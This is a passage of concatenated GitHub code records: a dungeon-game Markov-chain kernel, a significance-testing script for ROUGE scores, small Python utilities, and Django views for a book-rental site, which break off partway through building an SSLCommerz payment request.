probabilities over\n the states that are unchanged upon iteration of the markov\n chain.\n\n To simplify this, as the two cells considered here only impact\n the position on the grid, we use a reduced version of the\n states, only including n * m states (the grid positions).\n\n The result obtained at stability is the probability to be in\n each cell of the dungeon, after using a moving platform or\n teleporter. It accounts for every recursive teleportation\n that can occur.\n\n @param state: State= the particular state to be computed. It must be\n a state where the position corresponds to a 'moving cell'.\n\n This function deals with two difficult or 'special' states, the portal\n and the moving platform. They teleport the player to another cell, that\n is then triggered as if the player just walked into it. If that state is\n a portal or moving platform, the result is recursive and might lead again\n to a teleportation, effectively creating possible infinite loop.\n\n To deal with such states, we use two markov chains. One considering stable\n states, that must be iterated only once, and one for the recursive states\n that is iterated until we find a correct probability distribution.\n\n Ad this methods operates with heavy matrix operations that might be\n needed multiple times, we store the results of already computed calculations\n to reuse them and modify them according to the need.\n \"\"\"\n # This method will be heavily commented\n n, m = self.n, self.m\n\n # ──────────── extracting the grid position of the state ───────────── #\n p = state.position\n\n # ────────────── checking that the state given is valid ────────────── #\n assert self.map[p] in (Cell.magic_portal, Cell.moving_platform)\n\n # ────────────────── checking for existing results ─────────────────── #\n distrib = np.zeros(n * m, np.float64)\n if p in self.teleport_distributions:\n distrib = self.teleport_distributions[p]\n # ─────────────── compute the results if not available ─────────────── #\n else:\n # Create a probability vector where we are in p\n mu = np.zeros(n * m, np.float64)\n mu[p] = 1\n distrib = M.convergence_iteration(mu)\n self.teleport_distributions[p] = distrib\n assert distrib.shape == (n * m,) and abs(sum(distrib) - 1) < 10e-6\n\n # ───────────────── convert grid positions to state ────────────────── #\n # We now have the distribution over the grid position. 
However, we need\n # a distribution over the real state of the game, accounting for items.\n # As the special cells do not impact (yet) items, we just need to \n # put this vector at the right place in the (6 times) larger state vector\n # of the dungeon.\n padding = state.sword * 3 + state.treasure\n block_size = n * m\n\n transition = np.zeros(State.max_id + 1, np.float64)\n transition[padding * block_size: (padding + 1) * block_size] = distrib\n\n # ───── iterate once the new states over the rest of the dungeon ───── #\n transition = S.iterate(transition, 1)\n assert abs(sum(transition) - 1) < 10e-5\n return transition\n\n # ──────────────────── constructing the markov chain ───────────────────── #\n def markov_chain(self):\n n_state = State.max_id + 1 # because max id is n - 1\n M = np.zeros((n_state, n_state), np.float64)\n n, m = self.n, self.m\n death = n_state - 1\n M[death, death] = 1\n for sw in range(2):\n for tr in range(3):\n for p in range(n * m):\n i, j = p // m, p % m\n cell = self.map[i, j]\n state = State(sw, tr, p)\n index = state.id\n # ────────────── empty cell : stay inplace ─────────────── #\n if cell == Cell.empty or cell == Cell.start:\n M[index, index] = 1\n # ───────────── wall : bounce back to start ────────────── #\n if cell == Cell.wall:\n state.position = n * m - 1\n M[index, state.id] = 1\n # ──────────────── crack : kill instantly ──────────────── #\n if cell == Cell.crack:\n M[index, death] = 1\n # ──────────────────── ennemy : fight ──────────────────── #\n if cell == Cell.enemy_normal and state.sword:\n M[index, index] = 1 # fight won\n if cell == Cell.enemy_normal and not state.sword:\n M[index, index] = Dungeon.p_enemy\n M[index, death] = 1 - Dungeon.p_enemy\n # ───────── political enemy : do not use a sword ───────── #\n if cell == Cell.enemy_special and not state.sword:\n M[index, index] = 1 # not dangerous when weaponless\n if cell == Cell.enemy_special and state.sword:\n M[index, index] = Dungeon.p_enemy\n M[index, death] = 1 - Dungeon.p_enemy\n # ─────────────── magic sword acquisition ──────────────── #\n if cell == Cell.magic_sword:\n state.sword = 1\n M[index, state.id] = 1\n # ─────────────────── key acquisition ──────────────────── #\n if cell == Cell.golden_key:\n state.treasure = max(state.treasure, 1)\n # get the key if you didn't have it, else keep the treasure\n M[index, state.id] = 1\n # ───────────────── treasure acquisition ───────────────── #\n if cell == Cell.treasure:\n state.treasure = 2 if state.treasure >= 1 else 0\n M[index, state.id] = 1\n # ─────── trap : back to start, death, or nothing ──────── #\n if cell == Cell.trap:\n M[index, index] = 0.6 # nothing happens\n state.position = n * m - 1\n M[index, state.id] = 0.3 # tunnel to start\n M[index, death] = 0.1 # death\n if cell == Cell.magic_portal or cell == Cell.moving_platform:\n M[index, index] = 1\n return MarkovChain(M)\n\n def moving_markov_chain(self):\n \"\"\"\n Creates a markov chain with grid cells as states, to determine the\n probability to be in a state when using a recurrent transition (portal,\n moving-platform)\n \"\"\"\n n, m = self.n, self.m\n n_state = n * m\n M = np.zeros((n_state, n_state), np.float64)\n for p in range(n * m):\n i, j = p // m, p % m\n cell = self.map[i, j]\n if cell == Cell.moving_platform:\n valid_neighbors = self.map.all_cell_dist((i, j), 1)\n for (k, l) in valid_neighbors:\n p_next = k * m + l\n M[p, p_next] = 1 / len(valid_neighbors)\n elif cell == Cell.magic_portal:\n valid_cells = self.map.all_cell_dist((i, j), -1)\n for (k, l) in 
valid_cells:\n p_next = k * m + l\n M[p, p_next] = 1 / len(valid_cells)\n else:\n M[p, p] = 1\n return MarkovChain(M)\n\n # ────────────────────── is that dungeon winnable ? ────────────────────── #\n @property\n def winnable(self):\n \"\"\" getter for winnable attribute \"\"\"\n return self.map.winnable\n\n # ──────────────────────────── moving agents ───────────────────────────── #\n def move(self, agent: Adventurer, direction: Direction):\n \"\"\"\n Moves an agent in a direction\n\n @return an int, the reward associated with this action in that state\n \"\"\"\n self.last_actions[self.agents.index(agent)] = direction\n agent.pos = self.map.move(agent.pos, direction)\n return self.enter(agent, self.map[agent.pos])\n\n def teleport(self, agent: Adventurer, position: (int, int)):\n \"\"\" Teleports an agent to a given position (might be usefull for animations)\"\"\"\n i, j = position\n assert 0 <= i < self.n and 0 <= j < self.m, \"can't teleport outside of the dungeon\"\n assert self.map[position] != Cell.wall, \"can't teleport in a wall\"\n agent.pos = position\n self.caption += '\\n'\n return self.enter(agent, self.map[agent.pos])\n\n # ─────────────────────────── entering a cell ──────────────────────────── #\n def enter(self, agent: Adventurer, cell: Cell):\n \"\"\"\n Performs the most simple cells tasks, and delegates to appropriate\n functions if needed\n\n @return an int representing the reward of the move\n \"\"\"\n # assert cell != Cell.wall, \"wall cells should never be entered\"\n sword = agent.has_item(Cell.magic_sword)\n # -------------- walls bounce back to starting position -------------- #\n if cell == Cell.wall:\n self.caption += \"Bounced against a wall ... Back to start !\"\n return self.teleport(agent, (self.n - 1, self.m - 1))\n # ---------------- items are treated in the same way ----------------- #\n elif cell == Cell.golden_key or cell == Cell.magic_sword:\n if agent.has_item(cell):\n self.caption += \"Can't pick up another {}, already have one\".format(cell.name)\n else:\n self.caption += \"Picked up an item ({}) !!\".format(cell.name)\n agent.acquire_item(cell)\n return 0.5\n # ------------------ treasure is particular, though ------------------ #\n elif cell == Cell.treasure and agent.has_item(Cell.golden_key):\n if agent.has_item(cell):\n self.caption += \"Can't pick up another {}, already have one\".format(cell.name)\n else:\n self.caption += \"Got the treasure !\"\n agent.acquire_item(cell)\n return 0.5\n # ------------ magic portal and moving platforms teleport ------------ #\n elif cell == Cell.magic_portal:\n valid_cell = self.map.random_cell_dist()\n self.caption += \"STARGAAAATE : {} → {}\".format(agent.pos, valid_cell)\n return self.teleport(agent, valid_cell)\n elif cell == Cell.moving_platform:\n valid_neighbor = self.map.random_cell_dist(agent.pos, 1)\n (nx, ny), (x, y) = valid_neighbor, agent.pos\n self.caption += \"Woops ! It moves ! (teleported to {})\".format(Direction((nx - x, ny - y)).name)\n return self.teleport(agent, valid_neighbor) # adjacent cell <=> Manhattan dist of 1\n # ---------------------- oh, CRACK, you're dead ---------------------- #\n elif cell == Cell.crack:\n self.caption += \"DAMN ! CRACK !!! I'm dead.\"\n self.kill(agent)\n # ----------------------- care, it's a trap !! 
----------------------- #\n elif cell == Cell.trap:\n p = random() # random floating number in [0, 1[\n self.caption += \"ITS A TRAPPP \"\n if p < 0.1:\n self.caption += \"I'm dead.\"\n self.kill(agent) # 10% : death\n elif p < 0.4:\n self.caption += \"Back to start. (tunneled :] )\"\n return self.teleport(agent, (self.n - 1, self.m - 1)) # 30% : back to start\n else:\n self.caption += \"But it's ineffective.\"\n # 60% : nothing\n # ----------------------------- FIGHT !! ----------------------------- #\n # -------------------- normal enemy (use a sword) -------------------- #\n elif cell == Cell.enemy_normal and not sword:\n # no fight for the brave wielding a sword\n self.caption += \"Enemy in sight ! \"\n p = random() # random floating number in [0, 1[\n if p < Dungeon.p_enemy: # the player is victorious (p_enemy)%\n self.caption += \"Easily defeated.\"\n else:\n self.caption += \"Whoops, I'm dead\"\n self.kill(agent)\n elif cell == Cell.enemy_normal and sword:\n self.caption += \"BIM ! BAM ! MAGIC SWORD IN YOUR FACE !\"\n # -------------------------- special enemy --------------------------- #\n elif cell == Cell.enemy_special and not sword:\n # don't fight\n self.caption += \"Not a threat for me.\"\n elif cell == Cell.enemy_special and sword:\n self.caption += \"This enemy can't be slain ! \"\n p = random() # random floating number in [0, 1[\n if p > Dungeon.p_enemy: # the player is victorious (p_enemy)%\n self.caption += \"I managed to flee.\"\n else:\n self.caption += \"Goodbye, sweet world\"\n self.kill(agent)\n # ------------ returning to the start (with the treasure) ------------ #\n elif cell == Cell.start and agent.has_item(Cell.treasure):\n self.caption += \"I WON !!!\"\n self.victory(agent)\n return 1\n\n # ───────────── handle the reward in various situations ────────────── #\n return -1 if not agent.alive else 0\n\n # ────────────────────────────────── Reset ─────────────────────────────── #\n def reset(self):\n \"\"\" Hard reset : resets the map, and every agent \"\"\"\n self.map.reset()\n self.m, self.n = self.map.m, self.map.n\n self.last_actions = [None for x in self.agents]\n State.configure(self.n, self.m)\n self.caption = ''\n self.over, self.won = False, False\n for agent in self.agents:\n agent.n, agent.m = self.n, self.m\n agent.reset()\n\n def replay_map(self):\n \"\"\" Soft reset to replay the same map \"\"\"\n self.map.reset()\n self.last_actions = [None for x in self.agents]\n self.caption = ''\n self.over, self.won = False, False\n for agent in self.agents:\n agent.soft_reset()\n\n def load_map(self, path: str):\n self.map.load_map(path)\n self.reset()\n\n def save_map(self, path: str):\n self.map.save_map(path)\n\n # ────────────────────────── victory and defeat ────────────────────────── #\n def victory(self, agent: Adventurer):\n \"\"\" Method to restart the simulation and handle a victory \"\"\"\n self.won, self.over = True, True\n\n def defeat(self):\n \"\"\" Method to restart the simulation and handle defeat \"\"\"\n self.won, self.over = False, True\n\n def kill(self, agent: Adventurer):\n \"\"\" Method handling the death of an agent \"\"\"\n agent.kill()\n if all(map(lambda a: not a.alive, self.agents)):\n self.defeat() # every player is dead\n\n # ─────────────────────────── printing methods ──────────────────────────── #\n def show_last_actions(self):\n strings = []\n if any([a is None for a in self.last_actions]) or not self.last_actions:\n return 'no move yet'\n for (h, agent) in enumerate(self.agents):\n strings += ['player {} played {}'.format(\n h, '↑→↓←'[self.last_actions[h].to_int])]\n return '\\n'.join(strings)\n\n def colored_str(self):\n n, m = self.n, self.m\n key = None\n sword = None\n for p in range(n * m):\n i, j = p // m, p % m\n if self.map[i, j] == Cell.golden_key:\n key = (i, j)\n if self.map[i, j] == Cell.magic_sword:\n sword = (i, j)\n color = {\n Color.blue: [sword],\n Color.red: [(0, 0), key],\n Color.green: [self.agents[0].pos]\n }\n grid = ['' for i in range(n * m)]\n for p in range(n * m):\n grid[p] = self.map[p].value\n for (h, agent) in enumerate(self.agents):\n if agent.cell_id == p:\n if h == 0:\n grid[p] += '*'\n elif h == 1:\n grid[p] = '^' + grid[p]\n\n colored_map = color_grid(grid, (n, m), content_colors=color)\n legends = []\n agents_symbols = '*^'\n for h, agent in enumerate(self.agents):\n legends.append('{}: agent {}\'s position'.format(agents_symbols[h], h))\n\n legend = '\\n'.join(legends)\n return colored_map + legend\n\n # ──────────────────────────── magic methods ───────────────────────────── #\n def __str__(self):\n \"\"\" adds the position of agents to the string representation \"\"\"\n agents_symbols = '*^'\n assert len(self.agents) <= len(agents_symbols)\n if not self.agents:\n return str(self.map)\n map_repr = list(str(self.map))\n legends = []\n for h, agent in enumerate(self.agents):\n line = 1 + agent.i * 2\n col = 3 + agent.j * 4 - h * 2 # |^x*| when both agents are on the same cell\n map_repr[line * (self.m * 4 + 2) + col] = agents_symbols[h]\n legends.append('{}: agent {}\'s position'.format(agents_symbols[h], h))\n\n legend = '\\n'.join(legends)\n return ''.join(map_repr) + legend # + '\\n'\n\n def __repr__(self):\n return \"Dungeon({} x {}, {} players)\".format(self.n, self.m, len(self.agents))\n path_back = astar.process_shortest_path(treasure, start)\n\n # ----------------------- version with colors ------------------------ #\n agents_symbols = '*^'\n assert len(self.agents) <= len(agents_symbols)\n if not self.agents:\n return str(self.map)\n legends = []\n map_str = [cell.value for cell in self.map]\n for h, agent in enumerate(self.agents):\n (i, j), s = agent.pos, agents_symbols[h]\n p = i * self.map.m + j\n map_str[p] = s + map_str[p] if h else map_str[p] + s\n legends.append('{}: agent {}\'s position'.format(s, h))\n\n legend = '\\n'.join(legends)\n map_repr = utils.color_grid(map_str, (self.map.n, self.map.m),\n border_colors={\n utils.Color.blue: path_to_key,\n utils.Color.red: path_to_treasure,\n utils.Color.green: path_back\n })\n return map_repr + legend # + '\\n'\n\n\n# ──────────────────────────────── executable ──────────────────────────────── #\n# if __name__ == '__main__':\n # np.set_printoptions(precision=5, linewidth=200)\n\n # custom_game = Dungeon(4, 3)\n # b = Cell.start\n # p = Cell.magic_portal\n # e = Cell.empty\n # s = Cell.magic_sword\n # m = Cell.moving_platform\n # t = Cell.treasure\n # k = Cell.golden_key\n\n # # custom_game.map.load([t, p, p, s,\n # # p, p, m, p,\n # # m, p, m, m,\n # # k, m, p, b])\n # custom_game.map.load([t, e, s,\n # e, m, e,\n # e, m, e,\n # k, e, b])\n\n # print(custom_game)\n\n # S = custom_game.markov_chain()\n # M = custom_game.moving_markov_chain()\n\n # # print(State(0, 0, 11))\n\n # # tr = custom_game.special_transition(S, M, State(0, 0, 11))\n # # for (i, p) in enumerate(tr):\n # # s = State(s_id=i)\n # # if p > 0:\n # # print('- {:4.2%}: {}'.format(p, s))\n\n # T = custom_game.make_transition_matrix()\n # custom_game.display_transition(State(0, 0, 15), 
Direction.NORTH)\n","repo_name":"Slyces/RL-MDP","sub_path":"dungeon_game/kernel.py","file_name":"kernel.py","file_ext":"py","file_size_in_byte":30858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74735729424","text":"# Author: Mr.Xu\n# @Time : 2019/10/2 15:59\nimport os\n\nview_meg = '''\n请选择角色编号:\n 1 管理员\n 2 普通用户\n q 退出\n'''\nadmin_msg = '''\n 1.注册\n 2.登陆\n 3.上传视频\n 4.删除视频\n 5.发布公告\n'''\nuser_msg = '''\n 1.注册\n 2.登陆\n 3.冲会员\n 4.查看视频\n 5.下载免费电影\n 6.下载收费视频\n 7.查看观影记录\n 8.查看公告\n'''\nBASE_PATH = os.path.dirname(os.path.dirname(__file__))\nUPLOAD_MOVIE_PATH = os.path.join(BASE_PATH, \"upload_movies\")\n\n","repo_name":"XuCheng121/youku_sys","sub_path":"youku_client/conf/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"zh","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"70847149905","text":"import numpy as np\nfrom numpy import genfromtxt\nfrom scipy.stats import ttest_ind\nfrom scipy.stats import ks_2samp\nfrom scipy.stats import wilcoxon\nfrom scipy import stats\nimport csv\n\n\nclass SignificanceTesting(object):\n\tdef __init__(self, file_path):\n\t\tself.filePath = file_path\n\t\tself.models_scores = None\n\t\tself.data = None\n\t\tself.load_data()\n\n\t\t# statistical analysis\n\t\tself.mean = 0.0\n\t\tself.median = 0.0\n\t\tself.mode = 0.0\n\t\tself.min = 0.0\n\t\tself.max = 0.0\n\n\t\t# table data entry\n\t\tw = 6\n\t\th = 13\n\t\tself.results_data = [[0 for x in range(w)] for y in range(h)]\n\n\tdef load_data(self):\n\t\tself.models_scores = ['Baseline_R2', 'Baseline+Fusion_R2', 'Baseline+Ordering_R2',\n\t\t\t\t\t\t\t'Baseline+Ordering+Fusion_R2', 'Baseline_RSU4',\t'Baseline+Fusion_RSU4',\n\t\t\t\t\t\t\t'Baseline+Ordering_RSU4', 'Baseline+Ordering+Fusion_RSU4']\n\t\tself.data = genfromtxt(self.filePath, delimiter=',')[1:].T\n\n\tdef ks_test(self, list_a, list_b):\n\t\tvalue, pvalue = ks_2samp(list_a, list_b)\n\t\treturn pvalue\n\n\tdef t_test(self, list_a, list_b):\n\t\tvalue, pvalue = ttest_ind(list_a, list_b)\n\t\treturn pvalue\n\n\tdef wilcoxon_test(self, list_a, list_b):\n\t\tT, pvalue = wilcoxon(list_a, list_b)\n\t\treturn pvalue\n\n\tdef stat_analysis(self):\n\t\t# print(self.data)\n\t\tself.mean = np.mean(self.data, axis=1)\n\t\t# [ 0.4165538 0.3029308 0.4124338 0.2929442 0.4165538 0.3029308 0.4124338 0.2929442]\n\t\tself.median = np.median(self.data, axis=1)\n\t\t# [ 0.33333 0.218255 0.318015 0.207615 0.33333 0.218255 0.318015 0.207615]\n\t\tself.mode = stats.mode(self.data, axis=1)\n\t\t# ModeResult(mode=array([[ 1.], [ 0.], [ 0.], [ 0.], [ 1.], [ 0.], [ 0.], [ 0.]]),\n\t\t# \t\t\t count=array([[12], [17], [19], [17], [12], [17], [19], [17]]))\n\t\tself.min = np.min(self.data, axis=1) # [ 0. 0. 0. 0. 0. 0. 0. 0.]\n\t\tself.max = np.max(self.data, axis=1) # [ 1. 1. 1. 1. 1. 1. 1. 
1.]\n\n\tdef mean_diff_test(self, a, b):\n\t\treturn b - a\n\n\tdef init_table(self):\n\t\tself.results_data[0] = ['metric', 'model', 'mean diff', 'P(T test)', 'P(wilcoxon test)', 'P(ks test)']\n\t\tfor row in range(1, 7):\n\t\t\tself.results_data[row][0] = 'ROUGE-2'\n\t\tfor row in range(7, 13):\n\t\t\tself.results_data[row][0] = 'ROUGE-SU4'\n\t\tself.results_data[1][1] = 'Baseline & Fusion'\n\t\tself.results_data[2][1] = 'Baseline & Ordering'\n\t\tself.results_data[3][1] = 'Baseline & Ordering+Fusion'\n\t\tself.results_data[4][1] = 'Fusion & Ordering'\n\t\tself.results_data[5][1] = 'Fusion & Ordering+Fusion'\n\t\tself.results_data[6][1] = 'Ordering & Ordering+Fusion'\n\n\t\tself.results_data[7][1] = 'Baseline & Fusion'\n\t\tself.results_data[8][1] = 'Baseline & Ordering'\n\t\tself.results_data[9][1] = 'Baseline & Ordering+Fusion'\n\t\tself.results_data[10][1] = 'Fusion & Ordering'\n\t\tself.results_data[11][1] = 'Fusion & Ordering+Fusion'\n\t\tself.results_data[12][1] = 'Ordering & Ordering+Fusion'\n\n\t\treturn self.results_data\n\n\tdef fill_results(self):\n\t\t# mean diff\n\t\t# baseline/fusion, baseline/ordering, baseline/ordering+fusion,\n\t\t# fusion/ordering, fusion/ordering+fusion, ordering/ordering+fusion\n\t\tmean_rouge2 = self.mean[0:4]\n\t\tmean_rougesu4 = self.mean[4:]\n\t\tassert(len(mean_rouge2) == len(mean_rougesu4))\n\t\tself.cross_evaluate(self.mean_diff_test, 2, mean_rouge2, mean_rougesu4)\n\n\t\tdata_rouge2 = self.data[0:4]\n\t\tdata_rouge4 = self.data[4:]\n\t\tself.cross_evaluate(self.t_test, 3, data_rouge2, data_rouge4)\n\t\tself.cross_evaluate(self.wilcoxon_test, 4, data_rouge2, data_rouge4)\n\t\tself.cross_evaluate(self.ks_test, 5, data_rouge2, data_rouge4)\n\n\tdef cross_evaluate(self, fn, col_id, data_rouge2, data_rouge4):\n\t\tindex = 1\n\t\tfor i, list_a in enumerate(data_rouge2):\n\t\t\tfor j, list_b in enumerate(data_rouge2[i + 1:]):\n\t\t\t\tself.results_data[index][col_id] = fn(list_a, list_b)\n\t\t\t\tindex += 1\n\t\tfor i, list_a in enumerate(data_rouge4):\n\t\t\tfor j, list_b in enumerate(data_rouge4[i + 1:]):\n\t\t\t\tself.results_data[index][col_id] = fn(list_a, list_b)\n\t\t\t\tindex += 1\n\n\tdef write_output(self):\n\t\tresults_file = open('SigTestResults2.csv', 'w')\n\t\twith results_file:\n\t\t\twriter = csv.writer(results_file)\n\t\t\twriter.writerows(self.results_data)\n\t\tresults_file.close()\n\t\tprint(\"Dump result to SigTestResults2.csv successfully!\")\n\n\t# def boxing_plot(self):\n\t# \tplt.figure()\n\t# \tplt.boxplot(self.data.T)\n\t# \tplt.show()\n\n\nif __name__ == '__main__':\n\tfile_path = \"ROUGE_SCORES.csv\"\n\tsigInstance = SignificanceTesting(file_path)\n\tsigInstance.stat_analysis()\n\t# ks = sigInstance.ks_test()\n\t# t = sigInstance.t_test()\n\t# w = sigInstance.wilcoxon_test()\n\tsigInstance.init_table()\n\tsigInstance.fill_results()\n\tsigInstance.write_output()\n\n\n","repo_name":"hw9603/significance-testing","sub_path":"sigTesting.py","file_name":"sigTesting.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11640344014","text":"\nfrom random import randrange\nimport os\n\nos.system (\"cls\") \nnombre = [\"Anthony\", \"Addil\", \"Yohanna\", \"Karla\"]\ntemas = [\"Preguntas #1 y #2\", \"Pregunta #3\", \"Preguntas #4\", \"Preguntas #5\"]\ni = 0\nj = 0\nwhile i < 4: \n print(\"El estudiante \" + nombre[i] + \" le tocan las \" + temas[randrange(4)])\n i += 1","repo_name":"Anthonk08/Example-1","sub_path":"Programa de 
aletoriedad/Aletorio.py","file_name":"Aletorio.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13001594238","text":"import sys\nsys.stdin = open(\"D5_4701_input.txt\", \"r\")\n\nT = int(input())\nfor test_case in range(T):\n N = int(input())\n A = sorted(list(map(int, input().split())))\n B = sorted(list(map(int, input().split())))\n rate = []\n arr = [[0] * (N + 1) for _ in range(N + 1)]\n arr[0][0] = 1\n size = [0, 0]\n\n for i in range(N):\n rate.append((A[i], 0))\n rate.append((B[i], 1))\n rate = sorted(rate, key = lambda x : x[0])\n\n for i in range(2 * N):\n nt = rate[i][1]\n size[nt] += 1\n\n for j in range(N - 1, - 1, - 1):\n for k in range(N):\n if arr[j][k]:\n remains = size[nt ^ 1] - j\n\n if remains:\n arr[j + 1][k + (nt ^ 1)] = (arr[j + 1][k + (nt ^ 1)] + arr[j][k] * remains) % 1000000007\n\n print(\"#{}\".format(test_case + 1), *arr[N])","repo_name":"hongyong3/TIL","sub_path":"Algorithm/Swea/D5_4701.py","file_name":"D5_4701.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25833044874","text":"from django.shortcuts import render\nfrom django.shortcuts import redirect\nfrom .models import User, Book, Author \nfrom django.views.decorators.csrf import csrf_exempt\n# Create your views here.\nfrom django.http import HttpResponse\nfrom .models import User\nfrom django.db import connection\nfrom sslcommerz_lib import SSLCOMMERZ \nfrom datetime import date, timedelta\n\ndef index(request):\n return render(request, 'start_page/index.html')\n\ndef register_user(request):\n try:\n if(request.method == \"POST\"):\n fname = request.POST['firstname']\n lname = request.POST['lastname']\n email = request.POST['email']\n password = request.POST['password']\n nid = request.POST['nid']\n phone = request.POST['phone_number']\n address = request.POST['address']\n age = request.POST['age']\n\n # info = [fname, lname, email, password, nid, phone, address, age]\n # request.session['registered_info'] = info\n\n with connection.cursor() as cursor:\n cursor.execute(\"insert into user (fname, lname, email, password, nid, phone, address, age) values (%s, %s, %s, %s, %s, %s, %s, %s);\", [fname, lname, email, password, nid, phone, address, age])\n cursor.execute(\"insert into rent_provider (user_id) values (%s);\", [nid])\n cursor.execute(\"insert into rent_taker (user_id) values (%s);\", [nid])\n\n return redirect(\"confirm_reg\")\n except:\n return render(request, \"user_reg/user_reg.html\")\n \ndef confirm_reg(request):\n return render(request, 'user_reg/confirm_reg.html')\n \ndef loginUser(request):\n try:\n if(request.method == \"POST\"):\n email = request.POST['email']\n password = request.POST['pw']\n\n with connection.cursor() as cursor:\n cursor.execute(\"select * from user where email = %s and password = %s\", [email, password])\n login_dets = cursor.fetchone()\n\n with connection.cursor() as cursor:\n cursor.execute(\"select * from book where provider_id = %s\", [login_dets[0]])\n user_books = cursor.fetchall()\n \n if(email == login_dets[3] and password == login_dets[4]):\n # return render(request, 'user_reg/dashboard.html', {'data' : l, 'data1':ub})\n # return user_dashboard(request, login_dets, user_books)\n # return Dashboard(login_dets, user_books)\n request.session['user_info'] = login_dets\n request.session['user_books'] = user_books\n return redirect('user_dashboard')\n \n\n 
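# submitted credentials do not match the fetched row, so fall through and show the login form again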
else:\n #messages\n return render(request, \"user_reg/login_user.html\")\n \n except:\n return render(request, \"user_reg/login_user.html\")\n\n\ndef user_dashboard(request):\n l = request.session.get('user_info')\n ub = request.session.get('user_books')\n # info = request.session.get('registered_info')\n\n with connection.cursor() as cursor:\n cursor.execute(\"select book.book_id, name, author_name, genre, publisher, rent_cost from book inner join author where book.book_id = author.book_id and book.provider_id = %s;\", [l[0]])\n uub = cursor.fetchall()\n\n with connection.cursor() as cursor:\n cursor.execute(\"select book.book_id, book.name, book.copy_number, author.author_name, rents.rent_date, rents.rent_end_date, book.provider_id, user.phone from book inner join author on book.book_id = author.book_id inner join rents on book.book_id = rents.book_id inner join user on book.provider_id = user.nid where rents.rent_taker_id = %s;\", [l[0]])\n rented = cursor.fetchall()\n\n with connection.cursor() as cursor:\n cursor.execute(\"select book.book_id, book.name, author.author_name, book.copy_number, payment.paid_by from book inner join author inner join payment where book.book_id = author.book_id and payment.book_id = book.book_id and payment.received_by = %s;\", [l[0]])\n rented_to = cursor.fetchall()\n return render(request, 'user_reg/dashboard.html', {'data':l, 'data1':ub, 'data2':uub, 'data3' : rented, 'data4' : rented_to})\n\ndef upload_book(request):\n try:\n user_info = request.session.get('user_info')\n # print(user_info[0])\n\n if(request.method == \"POST\"):\n book_name = request.POST['book_name']\n author_name = request.POST['author']\n genre = request.POST['genre']\n copy_no = request.POST['copy_no']\n publisher = request.POST['publisher']\n rent_cost = request.POST['rent_cost']\n \n\n with connection.cursor() as cursor:\n cursor.execute(\"insert into book (book_id, name, genre, copy_number, publisher, rent_cost, provider_id) values (%s, %s, %s, %s, %s, %s, %s);\", [0, book_name, genre, copy_no, publisher, rent_cost, user_info[0]])\n cursor.execute(\"select book_id from book where name = %s and provider_id = %s;\", [book_name, user_info[0]])\n book_id = cursor.fetchone()\n cursor.execute(\"insert into author (book_id, author_name) values (%s, %s);\", [book_id[0], author_name])\n result = cursor.fetchone()\n\n if(result == None):\n return redirect('user_dashboard') \n\n return render(request, 'user_reg/upload_book_front.html')\n except:\n return render(request, 'user_reg/upload_book_front.html')\n \n\ndef search_book(request):\n try:\n if(request.method == \"POST\"):\n book_n = request.POST['book_name']\n \n user_info = request.session.get('user_info')\n\n book_n = book_n + '%'\n with connection.cursor() as cursor:\n cursor.execute(\" select book.book_id, name, genre, copy_number, publisher, book.rent_cost, book.provider_id, user.fname, user.lname, book.book_id, author.author_name from book inner join author on book.book_id = author.book_id inner join user on book.provider_id = user.nid left join rents on book.book_id = rents.book_id where rents.book_id IS NULL and book.provider_id != %s and book.name like %s;\", [user_info[0], book_n])\n search_result = cursor.fetchall()\n print(search_result)\n\n names = []\n for i in range(len(search_result)):\n with connection.cursor() as cursor:\n cursor.execute('select fname, lname from user where nid = %s', [search_result[i][6]])\n user_name = cursor.fetchall()\n names.append(user_name)\n\n # print(names)\n print(user_info)\n\n 
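# stash the matching rows in the session so the rent-confirmation views can read them back on the next request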
request.session['book_details'] = search_result\n print(search_result)\n\n return render(request, 'user_reg/search_book.html', {\"d1\":search_result, 'd2' : user_name, 'd3' : names})\n except:\n\n return render(request, 'user_reg/search_book.html')\n \ndef confirm_rent(request, pk):\n book_details = request.session.get('book_details')\n print(book_details)\n\n with connection.cursor() as cursor:\n cursor.execute('select fname, lname from user where nid = %s', [book_details[0][6]])\n user_name = cursor.fetchall()\n print(user_name)\n\n book = Book.objects.get(book_id=pk)\n author = Author.objects.get(book_id = pk)\n checkout_dets = [book.rent_cost]\n request.session['book_details'] = checkout_dets\n chosen_book = []\n\n with connection.cursor() as cursor:\n cursor.execute('select * from book where book_id = %s', [pk])\n a = cursor.fetchone()\n chosen_book.append(a)\n\n request.session['chosen_book'] = chosen_book\n\n # with connection.cursor() as cursor:\n # cursor.execute(\"select lp_number from delivery_man where provider_id is NULL order by rand() limit 1;\")\n # lp_no = cursor.fetchone()\n\n # print(lp_no)\n\n # with connection.cursor() as cursor:\n # cursor.execute('select user.address from user inner join book where book.provider_id = user.nid and book.provider_id = %s;', [chosen_book[0][6]])\n # address_provider = cursor.fetchone()\n\n # print(address_provider)\n\n return render(request, 'user_reg/confirm_rent.html', {'d1' : book_details, 'd2' : user_name, 'book' : book, 'author' : author})\n\n@csrf_exempt\ndef payment(request):\n # user_info = request.session.get('user_info')\n # book_details = request.session.get('book_details')\n\n try:\n today = date.today()\n till = today + timedelta(days=7)\n rent_start = str(today)\n rent_end = str(till)\n user_info = request.session.get('user_info')\n print(user_info)\n book_details = request.session.get('book_details')\n # print(book_details)\n chosen_book = request.session.get('chosen_book')\n print(chosen_book)\n settings = { 'store_id': 'onlin64dd360da6a67', 'store_pass': 'onlin64dd360da6a67@ssl', 'issandbox': True }\n sslcz = SSLCOMMERZ(settings)\n post_body = {}\n post_body['total_amount'] = book_details[0]\n post_body['currency'] = \"BDT\"\n post_body['tran_id'] = \"1\"\n post_body['success_url'] = \"http://127.0.0.1:8000/confirmed_pay/\"\n post_body['fail_url'] = \"http://127.0.0.1:8000/dashboard/\"\n post_body['cancel_url'] = \"http://127.0.0.1:8000/dashboard/\"\n post_body['emi_option'] = 0\n post_body['cus_name'] = 